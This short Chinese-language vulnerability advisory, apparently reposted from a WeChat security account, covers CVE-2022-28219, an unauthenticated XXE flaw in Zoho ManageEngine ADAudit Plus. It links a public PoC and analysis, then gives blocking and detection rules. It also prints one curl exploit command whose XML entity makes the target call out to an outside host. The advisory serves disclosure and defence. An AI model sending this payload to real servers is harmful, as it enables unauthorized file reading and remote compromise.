一、漏洞通告:
https://avd.aliyun.com/detail?id=AVD-2022-28219
Zoho ManageEngine ADAudit Plus 是美国Zoho Corporation公司的用于简化审计、证明合规性和检测威胁的一款产品。其7060版本之前 agentData 接口存在XXE漏洞,攻击者可在未授权的情况下利用XXE漏洞读取文件,甚至造成远程代码执行。
二、漏洞EXP/POC:
https://github.com/horizon3ai/CVE-2022-28219
三、漏洞分析:
CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus
https://www.horizon3.ai/red-team-blog-cve-2022-28219/
curl -X POST http://<adap_ip>:<port>/api/agent/tabs/agentData -d @payload.json{"DomainName": "smoke.net", "EventCode": 4688, "EventType": 0, "TimeGenerated": 0, "Task Content": "<?xml version="1.0" encoding="UTF-8"?><! foo [ <!ENTITY % xxe SYSTEM "http://10.0.220.200"> %xxe; ]>"}
四、漏洞拦截:
path路径前缀是"/api/agent/tabs/agentData",拦截
请求参数包含"<!ENTITY"和"SYSTEM",拦截
五、攻击流量检测:
请求参数包含"<!ENTITY"和"SYSTEM"
path路径前缀是"/api/agent/tabs/agentData"或"/cewolf/"
六、应用指纹检测:
response.body:/.*.manageengine.com.*/
原文始发于微信公众号(xiaozhu佩奇学安全):Zoho ManageEngine ADAudit Plus XXE漏洞(CVE-2022-28219)处置
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论